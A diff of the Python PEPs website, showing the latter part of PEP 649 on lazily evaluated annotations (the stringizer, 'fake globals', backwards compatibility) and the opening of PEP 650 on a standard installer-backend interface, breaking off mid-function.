In practice, the “stringizer” functionality will be implemented +in the ForwardRef object currently defined in the +typing module. ForwardRef will be extended to +implement all stringizer functionality; it will also be +extended to support evaluating the string it contains, +to produce the real value (assuming all symbols referenced +are defined). This means the ForwardRef object +will retain references to the appropriate “globals”, +“locals”, and even “closure” information needed to +evaluate the expression.

+

This technique is the core of how inspect.get_annotations +supports FORWARDREF and SOURCE formats. Initially, +inspect.get_annotations will call the object’s +__annotate__ method requesting the desired format. +If that raises NotImplementedError, inspect.get_annotations +will construct a “fake globals” environment, then call +the object’s __annotate__ method.

+
    +
  • inspect.get_annotations produces SOURCE format +by creating a new empty “fake globals” dict, binding it +to the object’s __annotate__ method, calling that +requesting VALUE format, and then extracting the string +“value” from each ForwardRef object +in the resulting dict.
  • +
  • inspect.get_annotations produces FORWARDREF format +by creating a new empty “fake globals” dict, pre-populating +it with the current contents of the __annotate__ method’s +globals dict, binding the “fake globals” dict to the object’s +__annotate__ method, calling that requesting VALUE +format, and returning the result.
  • +
+

This entire technique works because the __annotate__ functions +generated by the compiler are controlled by Python itself, and +are simple and predictable. They’re +effectively a single return statement, computing and +returning the annotations dict. Since most operations needed +to compute an annotation are implemented in Python using dunder +methods, and the stringizer supports all the relevant dunder +methods, this approach is a reliable, practical solution.

+

However, it’s not reasonable to attempt this technique with +just any __annotate__ method. This PEP assumes that +third-party libraries may implement their own __annotate__ +methods, and those functions would almost certainly work +incorrectly when run in this “fake globals” environment. +For that reason, this PEP allocates a flag on code objects, +one of the unused bits in co_flags, to mean “This code +object can be run in a ‘fake globals’ environment.” This +makes the “fake globals” environment strictly opt-in, and +it’s expected that only __annotate__ methods generated +by the Python compiler will set it.

+

The weakness in this technique is in handling operators which +don’t directly map to dunder methods on an object. These are +all operators that implement some manner of flow control, +either branching or iteration:

+
    +
  • Short-circuiting or
  • +
  • Short-circuiting and
  • +
  • Ternary operator (the if / then operator)
  • +
  • Generator expressions
  • +
  • List / dict / set comprehensions
  • +
  • Iterable unpacking
  • +
+

As a rule these techniques aren’t used in annotations, +so this weakness doesn’t pose a problem in practice. However, the +recent addition of TypeVarTuple to Python does use +iterable unpacking. The dunder methods +involved (__iter__ and __next__) don’t permit +distinguishing between iteration use cases; in order to +correctly detect which use case was involved, mere +“fake globals” and a “stringizer” wouldn’t be sufficient; +this would require a custom bytecode interpreter designed +specifically around producing SOURCE and FORWARDREF +formats.

+

Thankfully there’s a shortcut that will work fine: +the stringizer will simply assume that when its +iteration dunder methods are called, it’s in service +of iterator unpacking being performed by TypeVarTuple. +It will hard-code this behavior. This means no other +technique using iteration will work, but in practice +this won’t inconvenience real-world use cases.

+

Finally, note that the “fake globals” environment +will also require constructing a matching “fake locals” +dictionary, which for FORWARDREF format will be +pre-populated with the relevant locals dict. The +“fake globals” environment will also have to create +a fake “closure”, a tuple of ForwardRef objects +pre-created with the names of the free variables +referenced by the __annotate__ method.

+

ForwardRef proxies created from __annotate__ +methods that reference free variables will map the +names and closure values of those free variables into +the locals dictionary, to ensure that eval uses +the correct values for those names.

+
+
+

Compiler-generated __annotate__ functions

+

As mentioned in the previous section, the __annotate__ +functions generated by the compiler are simple. They’re +mainly a single return statement, computing and +returning the annotations dict.

+

However, the protocol for inspect.get_annotations +to request either FORWARDREF or SOURCE format +requires first asking the __annotate__ method to +produce it. __annotate__ methods generated by +the Python compiler won’t support either of these +formats and will raise NotImplementedError().

+
+
+

Third-party __annotate__ functions

+

Third-party classes and functions will likely need +to implement their own __annotate__ methods, +so that downstream users of +those objects can take full advantage of annotations. +In particular, wrappers will likely need to transform +the annotation dicts produced by the wrapped object: adding, +removing, or modifying the dictionary in some way.

+

Most of the time, third-party code will implement +their __annotate__ methods by calling +inspect.get_annotations on some existing upstream +object. For example, wrappers will likely request the +annotations dict for their wrapped object, +in the format that was requested from them, then +modify the returned annotations dict as appropriate +and return that. This allows third-party code to +leverage the “fake globals” technique without +having to understand or participate in it.

+

Third-party libraries that support both pre- and +post-PEP-649 versions of Python will have to innovate +their own best practices on how to support both. +One sensible approach would be for their wrapper to +always support __annotate__, then call it requesting +VALUE format and store the result as the +__annotations__ on their wrapper object. +This would support pre-649 Python semantics, and be +forward-compatible with post-649 semantics.

+
+
+

Pseudocode

+

Here’s high-level pseudocode for inspect.get_annotations:

+
def get_annotations(o, format):
+    if format == VALUE:
+        return dict(o.__annotations__)
+
+    if format == FORWARDREF:
+        try:
+            return dict(o.__annotations__)
+        except NameError:
+            pass
+
+    if o.__annotate__ is None:
+        return {}
+
+    c_a = o.__annotate__
+    try:
+        return c_a(format)
+    except NotImplementedError:
+        if not can_be_called_with_fake_globals(c_a):
+            return {}
+        c_a_with_fake_globals = make_fake_globals_version(c_a, format)
+        return c_a_with_fake_globals(VALUE)
+
+
+

Here’s what a Python compiler-generated __annotate__ method +might look like if it was written in Python:

+
def __annotate__(self, format):
+    if format != 1:
+        raise NotImplementedError()
+    return { ... }
+
+
+

Here’s how a third-party wrapper class might implement +__annotate__. In this example, the wrapper works +like functools.partial, pre-binding one parameter of +the wrapped callable, which for simplicity must be named +arg:

+
def __annotate__(self, format):
+    ann = inspect.get_annotations(self.wrapped_fn, format)
+    if 'arg' in ann:
+        del ann['arg']
+    return ann
+
+
+
+
+

Other modifications to the Python runtime

+

This PEP does not dictate exactly how it should be +implemented; that is left up to the language implementation +maintainers. However, the best implementation of this +PEP may require adding additional information to existing +Python objects, which is implicitly condoned by the acceptance +of this PEP.

+

For example, it may be necessary to add a +__globals__ attribute to class objects, so that the +__annotate__ function for that class can be lazily +bound, only on demand. Also, __annotate__ functions +defined on methods defined in a class may need to retain +a reference to the class’s __dict__, in order to +correctly evaluate names bound in that class. It’s expected +that the CPython implementation of this PEP will include +both those new attributes.

+

All such new information added to existing Python objects +should be done with “dunder” attributes, as they will of +course be implementation details.

+
+
+

Interactive REPL Shell

+

The semantics established in this PEP also hold true when executing +code in Python’s interactive REPL shell, except for module annotations +in the interactive module (__main__) itself. Since that module is +never “finished”, there’s no specific point where we can compile the +__annotate__ function.

+

For the sake of simplicity, in this case we forego delayed evaluation. +Module-level annotations in the REPL shell will continue to work +exactly as they do with “stock semantics”, evaluating immediately and +setting the result directly inside the __annotations__ dict.

+
+
+

Annotations On Local Variables Inside Functions

+

Python supports syntax for local variable annotations inside +functions. However, these annotations have no runtime +effect–they’re discarded at compile-time. Therefore, this +PEP doesn’t need to do anything to support them, the same +as stock semantics and PEP 563.

+
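
For example, this function runs fine under all three semantics, because the local variable annotation is never evaluated:

+
def f():
+    x: CompletelyUndefinedName = 3    # annotation discarded at compile time
+    return x
+
+print(f())    # 3 -- no NameError, the annotation was never evaluated
+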
+
+

Prototype

+

The original prototype implementation of this PEP can be found here:

+

https://github.com/larryhastings/co_annotations/

+

As of this writing, the implementation is severely out of date; +it’s based on Python 3.10 and implements the semantics of the +first draft of this PEP, from early 2021. It will be updated +shortly.

+
+
+

Performance Comparison

+

Performance with this PEP is generally favorable. There are four +scenarios to consider:

+
    +
  • the runtime cost when annotations aren’t defined,
  • +
  • the runtime cost when annotations are defined but not referenced,
  • +
  • the runtime cost when annotations are defined and referenced as objects, and
  • +
  • the runtime cost when annotations are defined and referenced as strings.
  • +
+

We’ll examine each of these scenarios in the context of all three +semantics for annotations: stock, PEP 563, and this PEP.

+

When there are no annotations, all three semantics have the same +runtime cost: zero. No annotations dict is created and no code is +generated for it. This requires no runtime processor time and +consumes no memory.

+

When annotations are defined but not referenced, the runtime cost +of Python with this PEP is roughly the same as PEP 563, and +improved over stock. The specifics depend on the object +being annotated:

+
    +
  • With stock semantics, the annotations dict is always built, and +set as an attribute of the object being annotated.
  • +
  • In PEP 563 semantics, for function objects, a precompiled +constant (a specially constructed tuple) is set as an attribute +of the function. For class and module objects, the annotations +dict is always built and set as an attribute of the class or module.
  • +
  • With this PEP, a single object is set as an attribute of the +object being annotated. Most of the time, this object is +a constant (a code object), but when the annotations require a +class namespace or closure, this object will be a tuple constructed +at binding time.
  • +
+

When annotations are both defined and referenced as objects, code using +this PEP should be much faster than PEP 563, and be as fast +or faster than stock. PEP 563 semantics requires invoking +eval() for every value inside an annotations dict, which is +enormously slow. And the implementation of this PEP generates measurably +more efficient bytecode for class and module annotations than stock +semantics; for function annotations, this PEP and stock semantics +should be about the same speed.

+

The one case where this PEP will be noticeably slower than PEP 563 is when +annotations are requested as strings; it’s hard to beat “they are already +strings.” But stringized annotations are intended for online documentation use +cases, where performance is less likely to be a key factor.

+

Memory use should also be comparable in all three scenarios across +all three semantic contexts. In the first and third scenarios, +memory usage should be roughly equivalent in all cases. +In the second scenario, when annotations are defined but not +referenced, using this PEP’s semantics will mean the +function/class/module will store one unused code object (possibly +bound to an unused function object); with the other two semantics, +they’ll store one unused dictionary or constant tuple.

+
+
+
+

Backwards Compatibility

+
+

Backwards Compatibility With Stock Semantics

+

This PEP preserves nearly all existing behavior of +annotations from stock semantics:

+
    +
  • The format of the annotations dict stored in +the __annotations__ attribute is unchanged. +Annotations dicts contain real values, not strings +as per PEP 563.
  • +
  • Annotations dicts are mutable, and any changes to them are +preserved.
  • +
  • The __annotations__ attribute can be explicitly set, +and any legal value set this way will be preserved.
  • +
  • The __annotations__ attribute can be deleted using +the del statement.
  • +
+

Most code that works with stock semantics should +continue to work when this PEP is active without any +modification necessary. But there are exceptions, +as follows.

+

First, there’s a well-known idiom for accessing class +annotations which may not work correctly when this +PEP is active. The original implementation of class +annotations had what can only be called a bug: if a class +didn’t define any annotations of its own, but one +of its base classes did define annotations, the class +would “inherit” those annotations. This behavior +was never desirable, so user code found a workaround: +instead of accessing the annotations on the class +directly via cls.__annotations__, code would +access the class’s annotations via its dict, as in +cls.__dict__.get("__annotations__", {}). This +idiom worked because classes stored their annotations +in their __dict__, and accessing them this way +avoided the lookups in the base classes. The technique +relied on implementation details of CPython, so it +was never supported behavior–though it was necessary. +However, when this PEP is active, a class may have +annotations defined but not yet have called __annotate__ +and cached the result, in which case this approach +would mistakenly conclude that the class has no +annotations. +In any case, the bug was fixed as of Python 3.10, and the +idiom should no longer be used. Also as of Python 3.10, +there’s an +Annotations HOWTO +that defines best practices +for working with annotations; code that follows these +guidelines will work correctly even when this PEP is +active, because it suggests using different approaches +to get annotations from class objects based on the +Python version the code runs under.

+

Since delaying the evaluation of annotations until they are +introspected changes the semantics of the language, it’s observable +from within the language. Therefore it’s possible to write code +that behaves differently based on whether annotations are +evaluated at binding time or at access time, e.g.

+
mytype = str
+def foo(a:mytype): pass
+mytype = int
+print(foo.__annotations__['a'])
+
+
+

This will print <class 'str'> with stock semantics +and <class 'int'> when this PEP is active. This is +therefore a backwards-incompatible change. However, this +example is poor programming style, so this change seems +acceptable.

+

There are two uncommon interactions possible with class +and module annotations that work with stock semantics +that would no longer work when this PEP was active. +These two interactions would have to be prohibited. The +good news is, neither is common, and neither is considered +good practice. In fact, they’re rarely seen outside of +Python’s own regression test suite. They are:

+
    +
  • Code that sets annotations on module or class attributes +from inside any kind of flow control statement. It’s +currently possible to set module and class attributes with +annotations inside an if or try statement, and it works +as one would expect. It’s untenable to support this behavior +when this PEP is active.
  • +
  • Code in module or class scope that references or modifies the +local __annotations__ dict directly. Currently, when +setting annotations on module or class attributes, the generated +code simply creates a local __annotations__ dict, then adds +mappings to it as needed. It’s possible for user code +to directly modify this dict, though this doesn’t seem to be +an intentional feature. Although it would be possible to support +this after a fashion once this PEP was active, the semantics +would likely be surprising and wouldn’t make anyone happy.
  • +
+

Note that these are both also pain points for static type checkers, +and are unsupported by those tools. It seems reasonable to +declare that both are at the very least unsupported, and their +use results in undefined behavior. It might be worth making a +small effort to explicitly prohibit them with compile-time checks.

+

Finally, if this PEP is active, annotation values shouldn’t use +the if / else ternary operator. Although this will work +correctly when accessing o.__annotations__ or requesting +inspect.VALUE from a helper function, the boolean expression +may not compute correctly with inspect.FORWARDREF when +some names are defined, and would be far less correct with +inspect.SOURCE.

+
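
A sketch of the kind of annotation better avoided, assuming this PEP is active (DEBUG, VerboseType, and TerseType are hypothetical names):

+
DEBUG = True
+
+def f(x: VerboseType if DEBUG else TerseType):    # better avoided
+    ...
+
+# With inspect.FORWARDREF, an undefined DEBUG becomes a proxy and
+# bool(proxy) picks a branch arbitrarily; with inspect.SOURCE, only
+# the branch actually taken is recorded, not the whole ternary.
+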
+
+

Backwards Compatibility With PEP 563 Semantics

+

PEP 563 changed the semantics of annotations. When its semantics +are active, annotations must assume they will be evaluated in +module-level or class-level scope. They may no longer refer directly +to local variables in the current function or an enclosing function. +This PEP removes that restriction, and annotations may refer to any +local variable.

+

PEP 563 requires using eval (or a helper function like +typing.get_type_hints or inspect.get_annotations that +uses eval for you) to convert stringized annotations into +their “real” values. Existing code that activates stringized +annotations, and calls eval() directly to convert the strings +back into real values, can simply remove the eval() call. +Existing code using a helper function would continue to work +unchanged, though use of those functions may become optional.

+

Static typing users often have modules that only contain +inert type hint definitions–but no live code. These modules +are only needed when running static type checking; they aren’t +used at runtime. But under stock semantics, these modules +have to be imported in order for the runtime to evaluate and +compute the annotations. Meanwhile, these modules often +caused circular import problems that could be difficult or +even impossible to solve. PEP 563 allowed users to solve +these circular import problems by doing two things. First, +they activated PEP 563 in their modules, which meant annotations +were constant strings, and didn’t require the real symbols to +be defined in order for the annotations to be computable. +Second, this permitted users to only import the problematic +modules in an if typing.TYPE_CHECKING block. This allowed +the static type checkers to import the modules and the type +definitions inside, but they wouldn’t be imported at runtime. +So far, this approach will work unchanged when this PEP is +active; if typing.TYPE_CHECKING is supported behavior.

+

However, some codebases actually did examine their +annotations at runtime, even when using the if typing.TYPE_CHECKING +technique and not importing definitions used in their annotations. +These codebases examined the annotation strings without +evaluating them, instead relying on identity checks or +simple lexical analysis on the strings.

+

This PEP supports these techniques too. But users will need +to port their code to it. First, user code will need to use +inspect.get_annotations or typing.get_type_hints to +access the annotations; they won’t be able to simply get the +__annotations__ attribute from their object. Second, +they will need to specify either inspect.FORWARDREF +or inspect.SOURCE for the format when calling that +function. This means the helper function can succeed in +producing the annotations dict, even when not all the symbols +are defined. Code expecting stringized annotations should +work unmodified with inspect.SOURCE formatted annotations +dicts; however, users should consider switching to +inspect.FORWARDREF, as it may make their analysis easier.

+

Similarly, PEP 563 permitted use of class decorators on +annotated classes in a way that hadn’t previously been possible. +Some class decorators (e.g. dataclasses) examine the annotations +on the class. Because class decorators using the @ decorator +syntax are run before the class name is bound, they can cause +unsolvable circular-definition problems. If you annotate attributes +of a class with references to the class itself, or annotate attributes +in multiple classes with circular references to each other, you +can’t decorate those classes with the @ decorator syntax +using decorators that examine the annotations. PEP 563 allowed +this to work, as long as the decorators examined the strings lexically +and didn’t use eval to evaluate them (or handled the NameError +with further workarounds). When this PEP is active, decorators will +be able to compute the annotations dict in inspect.SOURCE or +inspect.FORWARDREF format using the helper functions. This +will permit them to analyze annotations containing undefined +symbols, in the format they prefer.

+

Early adopters of PEP 563 discovered that “stringized” +annotations were useful for automatically-generated documentation. +Users experimented with this use case, and Python’s pydoc +has expressed some interest in this technique. This PEP supports +this use case; the code generating the documentation will have to be +updated to use a helper function to access the annotations in +inspect.SOURCE format.

+

Finally, the warnings about using the if / else ternary +operator in annotations apply equally to users of PEP 563. +It currently works for them, but could produce incorrect +results when requesting some formats from the helper functions.

+

If this PEP is accepted, PEP 563 will be deprecated and +eventually removed. To facilitate this transition for early +adopters of PEP 563, who now depend on its semantics, +inspect.get_annotations and typing.get_type_hints will +implement a special affordance.

+

The Python compiler won’t generate annotation code objects +for objects defined in a module where PEP 563 semantics are +active, even if this PEP is accepted. So, under normal +circumstances, requesting inspect.SOURCE format from a +helper function would return an empty dict. As an affordance, +to facilitate the transition, if the helper functions detect +that an object was defined in a module with PEP 563 active, +and the user requests inspect.SOURCE format, they’ll return +the current value of the __annotations__ dict, which in +this case will be the stringized annotations. This will allow +PEP 563 users who lexically analyze stringized annotations +to immediately change over to requesting inspect.SOURCE format +from the helper functions, which will hopefully smooth their +transition away from PEP 563.

+
+
+
+

Rejected Ideas

+
+

“Just store the strings”

+

One proposed idea for supporting SOURCE format was for +the Python compiler to emit the actual source code for the +annotation values somewhere, and to furnish that when +the user requested SOURCE format.

+

This idea wasn’t rejected so much as categorized as +“not yet”. We already know we need to support FORWARDREF +format, and that technique can be adapted to support +SOURCE format in just a few lines. There are many +unanswered questions about this approach:

+
    +
  • Where would we store the strings? Would they always +be loaded when the annotated object was created, or +would they be lazy-loaded on demand? If so, how +would the lazy-loading work?
  • +
  • Would the “source code” include the newlines and +comments of the original? Would it preserve all +whitespace, including indents and extra spaces used +purely for formatting?
  • +
+

It’s possible we’ll revisit this topic in the future, +if improving the fidelity of SOURCE values to the +original source code is judged sufficiently important.

+
+
+
+

Acknowledgements

+

Thanks to Carl Meyer, Barry Warsaw, Eric V. Smith, +Mark Shannon, Jelle Zijlstra, and Guido van Rossum for ongoing +feedback and encouragement.

+

Particular thanks to several individuals who contributed key ideas +that became some of the best aspects of this proposal:

+
    +
  • Carl Meyer suggested the “stringizer” technique that made +FORWARDREF and SOURCE formats possible, which +made forward progress on this PEP possible after +a year of languishing due to seemingly-unfixable problems. +He also suggested the affordance for PEP 563 users where +inspect.SOURCE will return the stringized annotations, +and offered many more suggestions besides. Carl was also the primary +correspondent in private email threads discussing this PEP, +and was a tireless resource and voice of sanity. This PEP +would almost certainly not have been accepted were it not +for Carl’s contributions.
  • +
  • Mark Shannon suggested building the entire annotations dict +inside a single code object, and only binding it to a function +on demand.
  • +
  • Guido van Rossum suggested that __annotate__ +functions should duplicate the name visibility rules of +annotations under “stock” semantics.
  • +
  • Jelle Zijlstra contributed not only feedback–but code!
  • +
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0649.rst

+

Last modified: 2024-10-17 12:49:39 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0650/index.html b/pep-0650/index.html new file mode 100644 index 00000000000..435ae0baa9a --- /dev/null +++ b/pep-0650/index.html @@ -0,0 +1,807 @@ + + + + + + + + PEP 650 – Specifying Installer Requirements for Python Projects | peps.python.org + + + + + + + + + + + + + + +
+
+

+
+
+

PEP 650 – Specifying Installer Requirements for Python Projects

+
+
Author:
+
Vikram Jayanthi <vikramjayanthi at google.com>, +Dustin Ingram <di at python.org>, +Brett Cannon <brett at python.org>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Withdrawn
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
16-Jul-2020
+
Post-History:
+
14-Jan-2021
+
+
+
+
+
+

Abstract

+

Python package installers are not completely interoperable with each +other. While pip is the most widely used installer and a de facto +standard, other installers such as Poetry or Pipenv are popular as +well due to offering unique features which are optimal for certain +workflows and not directly in line with how pip operates.

+

While the abundance of installer options is good for end-users with +specific needs, the lack of interoperability between them makes it +hard to support all potential installers. Specifically, the lack of a +standard requirements file for declaring dependencies means that each +tool must be explicitly used in order to install dependencies +specified with their respective format. Otherwise tools must emit a +requirements file which leads to potential information loss for the +installer as well as an added export step as part of a developer’s +workflow.

+

By providing a standardized API that can be used to invoke a +compatible installer, we can solve this problem without needing to +resolve individual concerns, unique requirements, and +incompatibilities between different installers and their lock files.

+

Installers that implement the specification can be invoked in a +uniform way, allowing users to use their installer of choice as if +they were invoking it directly.

+
+
+

Terminology

+
+
Installer interface
The interface by which an installer backend and a +universal installer interact.
+
Universal installer
An installer that can invoke an installer backend by calling the +optional invocation methods of the installer interface. This can +also be thought of as the installer frontend, à la the build +project for PEP 517.
+
Installer backend
An installer that implements the installer interface, allowing +it to be invoked by a universal installer. An +installer backend may itself also be a universal installer, +but it is not required. In comparison to PEP 517, this would +be Flit. Installer backends may be wrapper packages around +a backing installer, e.g. Poetry could choose to not support this +API, but another package could act as a wrapper that invokes +Poetry as appropriate to perform an installation.
+
Dependency group
A set of dependencies that are related and required to be +installed simultaneously for some purpose. For example, a +“test” dependency group could include the dependencies required to +run the test suite. How dependency groups are specified is up to +the installer backend.
+
+
+
+

Motivation

+

This specification allows anyone to invoke and interact with +installer backends that implement the specified interface, allowing +for a universally supported layer on top of existing tool-specific +installation processes.

+

This in turn would enable the use of all installers that implement the +specified interface to be used in environments that support a single +universal installer, as long as that installer implements this +specification as well.

+

Below, we identify various use-cases applicable to stakeholders in the +Python community and anyone who interacts with Python package +installers. For developers or companies, this PEP would allow for +increased functionality and flexibility with Python package +installers.

+
+

Providers

+

Providers are the parties (organization, person, community, etc.) that +supply a service or software tool which interacts with Python +packaging and consequently Python package installers. Two different +types of providers are considered:

+
+

Platform/Infrastructure Providers

+

Platform providers (cloud environments, application hosting, etc.) and +infrastructure service providers need to support package installers +for their users to install Python dependencies. Most only support pip; +however, there is user demand for other Python installers. Most +providers do not want to maintain support for more than one installer +because of the complexity it adds to their software or service and the +resources it takes to do so.

+

Via this specification, we can enable a provider-supported +universal installer to invoke the user-desired installer backend +without the provider’s platform needing to have specific knowledge of +said backend. What this means is if Poetry implemented the installer +backend API proposed by this PEP (or some other package wrapped Poetry +to provide the API), then platform providers would support Poetry +implicitly.

+
+
+

IDE Providers

+

Integrated development environments may interact with Python package +installation and management. Most only support pip as a Python package +installer, and users are required to find workarounds to install +their dependencies using other package installers. Similar to the +situation with PaaS & IaaS providers, IDE providers do not want to +maintain support for N different Python installers. Instead, +implementers of the installer interface (installer backends) could +be invoked by the IDE by it acting as a universal installer.

+
+
+
+

Developers

+

Developers are teams, people, or communities that code and use Python +package installers and Python packages. Three different types of +developers are considered:

+
+

Developers using PaaS & IaaS providers

+

Most PaaS and IaaS providers only support one Python package +installer: pip. (Some exceptions include Heroku’s Python buildpack, +which supports pip and Pipenv). This dictates the installers that +developers can use while working with these providers, which might not +be optimal for their application or workflow.

+

Installers adopting this PEP to become installer backends would allow +users to use third party platforms/infrastructure without having to +worry about which Python package installer they are required to use as +long as the provider uses a universal installer.

+
+
+

Developers using IDEs

+

Most IDEs only support pip or a few Python package installers. +Consequently, developers must use workarounds or hacky methods to +install their dependencies if they use an unsupported package +installer.

+

If the IDE uses/provides a universal installer it would allow for +any installer backend that the developer wanted to be used to +install dependencies, freeing them of any extra work to install their +dependencies in order to integrate into the IDE’s workflow more +closely.

+
+
+

Developers working with other developers

+

Developers want to be able to use the installer of their choice while +working with other developers, but currently have to synchronize their +installer choice for compatibility of dependency installation. If all +preferred installers instead implemented the specified interface, it +would allow for cross use of installers, allowing developers to choose +an installer regardless of their collaborator’s preference.

+
+
+
+

Upgraders & Package Infrastructure Providers

+

Package upgraders and package infrastructure in CI/CD such as +Dependabot, PyUP, etc. currently support a few installers. They work +by parsing and editing the installer-specific dependency files +directly (such as requirements.txt or poetry.lock) with +relevant package information such as upgrades, downgrades, or new +hashes. Similar to Platform and IDE providers, most of these providers +do not want to support N different Python package installers as that +would require supporting N different file types.

+

Currently, these services/bots have to implement support for each +package installer individually. Inevitably, the most popular +installers are supported first, and less popular tools are often never +supported. By implementing this specification, these services/bots can +support any (compliant) installer, allowing users to select the tool +of their choice. This will allow for more innovation in the space, as +platforms and IDEs are no longer forced to prematurely select a +“winner”.

+
+
+

Open Source Community

+

Specifying installer requirements and adopting this PEP will reduce +the friction between Python package installers and people’s workflows. +Consequently, it will reduce the friction between Python package +installers and 3rd party infrastructure/technologies such as PaaS or +IDEs. Overall, it will allow for easier development, deployment and +maintenance of Python projects as Python package installation becomes +simpler and more interoperable.

+

Specifying requirements and creating an interface for installers can +also increase the pace of innovation around installers. This would +allow for installers to experiment and add unique functionality +without requiring the rest of the ecosystem to do the same. Support +becomes easier and more likely for a new installer regardless of the +functionality it adds and the format in which it writes dependencies, +while reducing the developer time and resources needed to do so.

+
+
+
+

Specification

+

Similar to how PEP 517 specifies build systems, the install system +information will live in the pyproject.toml file under the +install-system table.

+
+

[install-system]

+

The install-system table is used to store install-system relevant data +and information. There are two required keys for this table: +requires and install-backend. The requires key holds the +minimum requirements for the installer backend to execute and which +will be installed by the universal installer. The install-backend +key holds the name of the install backend’s entry point. This will +allow the universal installer to install the requirements for the +installer backend itself to execute (not the requirements that the +installer backend itself will install) as well as invoke the +installer backend.

+

If either of the required keys is missing or empty, then the +universal installer SHOULD raise an error.

+

All package names interacting with this interface are assumed to +follow PEP 508’s “Dependency specification for Python Software +Packages” format.

+

An example install-system table:

+
# pyproject.toml
+[install-system]
+# e.g., using pipenv as the backend
+requires = ["pipenv"]
+install-backend = "pipenv.api:main"
+
+
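
To illustrate how these keys might be consumed, here is a minimal,
hypothetical sketch of a universal installer front end; the function
name and error handling are illustrative, and it assumes the entry
point resolves to an object exposing the interface hooks defined below:

import importlib
import os
import sys
import tomllib  # Python 3.11+; the "tomli" package on older versions

def invoke_backend(project_dir):
    with open(os.path.join(project_dir, "pyproject.toml"), "rb") as f:
        table = tomllib.load(f).get("install-system", {})
    if not table.get("requires") or not table.get("install-backend"):
        raise RuntimeError("missing or empty [install-system] keys")
    # A real universal installer would first install table["requires"].
    # "pipenv.api:main" -> module "pipenv.api", attribute "main";
    # assumption: the resulting object exposes the interface hooks.
    module_name, _, attr = table["install-backend"].partition(":")
    backend = getattr(importlib.import_module(module_name), attr)
    return backend.invoke_install(os.path.abspath(project_dir))

if __name__ == "__main__":
    sys.exit(invoke_backend("."))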
+
+

Installer Requirements:

+

The requirements specified by the requires key must be within the +constraints specified by PEP 517. Specifically, that dependency +cycles are not permitted and the universal installer SHOULD refuse +to install the dependencies if a cycle is detected.

+
+
+

Additional parameters or tool specific data

+

Additional parameters or tool (installer backend) data may also be +stored in the pyproject.toml file. This would be in the “tool.*” +table as specified by PEP 518. For example, if the +installer backend is Poetry and you wanted to specify multiple +dependency groups, the tool.poetry tables could look like this:

+
[tool.poetry.dev-dependencies]
+dependencies = "dev"
+
+[tool.poetry.deploy]
+dependencies = "deploy"
+
+
+

Data may also be stored in other ways as the installer backend sees +fit (e.g. separate configuration file).

+
+
+
+

Installer interface:

+

The installer interface contains mandatory and optional hooks. +Compliant installer backends MUST implement the mandatory hooks and +MAY implement the optional hooks. A universal installer MAY +implement any of the installer backend hooks itself, to act as both +a universal installer and installer backend, but this is not +required.

+

All hooks take **kwargs: arbitrary parameters that an +installer backend may require beyond those already specified, +allowing for backwards compatibility. If unexpected parameters are +passed to the installer backend, it should ignore them.

+

The following information is akin to the corresponding section in +PEP 517. The hooks may be called with keyword arguments, so +installer backends implementing them should be careful to make sure +that their signatures match both the order and the names of the +arguments above.

+

All hooks MAY print arbitrary informational text to stdout and +stderr. They MUST NOT read from stdin, and the +universal installer MAY close stdin before invoking the hooks.

+

The universal installer may capture stdout and/or stderr +from the backend. If the backend detects that an output stream is not +a terminal/console (e.g. not sys.stdout.isatty()), it SHOULD +ensure that any output it writes to that stream is UTF-8 encoded. +The universal installer MUST NOT fail if captured output is not +valid UTF-8, but it MAY not preserve all the information in that case +(e.g. it may decode using the replace error handler in Python). If the +output stream is a terminal, the installer backend is responsible +for presenting its output accurately, as for any program running in a +terminal.

+

If a hook raises an exception, or causes the process to terminate, +then this indicates an error.

+
+
+

Mandatory hooks:

+
+

invoke_install

+

Installs the dependencies:

+
def invoke_install(
+    path: Union[str, bytes, PathLike[str]],
+    *,
+    dependency_group: str = None,
+    **kwargs
+) -> int:
+    ...
+
+
+
    +
  • path : An absolute path where the installer backend should be +invoked from (e.g. the directory where pyproject.toml is +located).
  • +
  • dependency_group : An optional flag specifying a dependency +group that the installer backend should install. The install will +error if the dependency group doesn’t exist. A user can find all +dependency groups by calling +get_dependency_groups() if dependency groups are +supported by the installer backend.
  • +
  • **kwargs : Arbitrary parameters that an installer backend may +require that are not already specified; allows for backwards +compatibility.
  • +
  • Returns : An exit code (int). 0 if successful, any positive integer +if unsuccessful.
  • +
+

The universal installer will use the exit code to determine if the +installation is successful and SHOULD return the exit code itself.

+
+
+
+

Optional hooks:

+
+

invoke_uninstall

+

Uninstall the specified dependencies:

+
def invoke_uninstall(
+    path: Union[str, bytes, PathLike[str]],
+    *,
+    dependency_group: str = None,
+    **kwargs
+) -> int:
+    ...
+
+
+
    +
  • path : An absolute path where the installer backend should be +invoked from (e.g. the directory where pyproject.toml is +located).
  • +
  • dependency_group : An optional flag specifying a dependency +group that the installer backend should uninstall.
  • +
  • **kwargs : Arbitrary parameters that an installer backend may +require that are not already specified; allows for backwards +compatibility.
  • +
  • Returns : An exit code (int). 0 if successful, any positive integer +if unsuccessful.
  • +
+

The universal installer MUST invoke the installer backend at the +same path at which the universal installer itself was invoked.

+

The universal installer will use the exit code to determine if the +uninstall is successful and SHOULD return the exit code itself.

+
+
+

get_dependencies_to_install

+

Returns the dependencies that would be installed by +invoke_install(...). This allows package upgraders +(e.g., Dependabot) to retrieve the dependencies that would be +installed without parsing the dependency file:

+
def get_dependencies_to_install(
+    path: Union[str, bytes, PathLike[str]],
+    *,
+    dependency_group: str = None,
+    **kwargs
+) -> Sequence[str]:
+    ...
+
+
+
    +
  • path : An absolute path where the installer backend should be +invoked from (e.g. the directory where pyproject.toml is +located).
  • +
  • dependency_group : Specify a dependency group to get the +dependencies invoke_install(...) would install for that +dependency group.
  • +
  • **kwargs : Arbitrary parameters that an installer backend may +require that are not already specified; allows for backwards +compatibility.
  • +
  • Returns: A list of dependencies (PEP 508 strings) to install.
  • +
+

If the group is specified, the installer backend MUST return the +dependencies corresponding to the provided dependency group. If the +specified group doesn’t exist, or dependency groups are not supported +by the installer backend, the installer backend MUST raise an +error.

+

If the group is not specified, and the installer backend provides +the concept of a default/unspecified group, the installer backend +MAY return the dependencies for the default/unspecified group, but +otherwise MUST raise an error.

+
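
As a rough illustration, a backend that (like the pip-based example
later in this PEP) maps dependency groups to requirements files might
implement this hook as follows; the file-per-group layout is purely an
assumption of the sketch:

import os

def get_dependencies_to_install(path, *, dependency_group=None, **kwargs):
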